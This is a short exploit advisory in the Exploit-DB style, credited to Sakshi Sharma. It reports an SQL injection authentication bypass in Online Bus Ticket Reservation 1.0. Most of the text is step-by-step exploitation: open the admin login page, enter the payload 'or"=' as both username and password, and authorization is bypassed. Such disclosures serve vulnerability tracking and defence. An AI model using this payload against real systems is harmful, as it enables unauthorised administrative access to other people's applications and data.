Authored by Sakshi Sharma

Online Bus Ticket Reservation version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection
# Date: 2020-12-07
# Exploit Author: Sakshi Sharma
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#Vulnerable Page: admin page

Open the Application
check the URL:
Open Admin Login
Enter username: 'or"='
Enter password: 'or"='
click on login
The SQL payload gets executed and authorization is bypassed successfully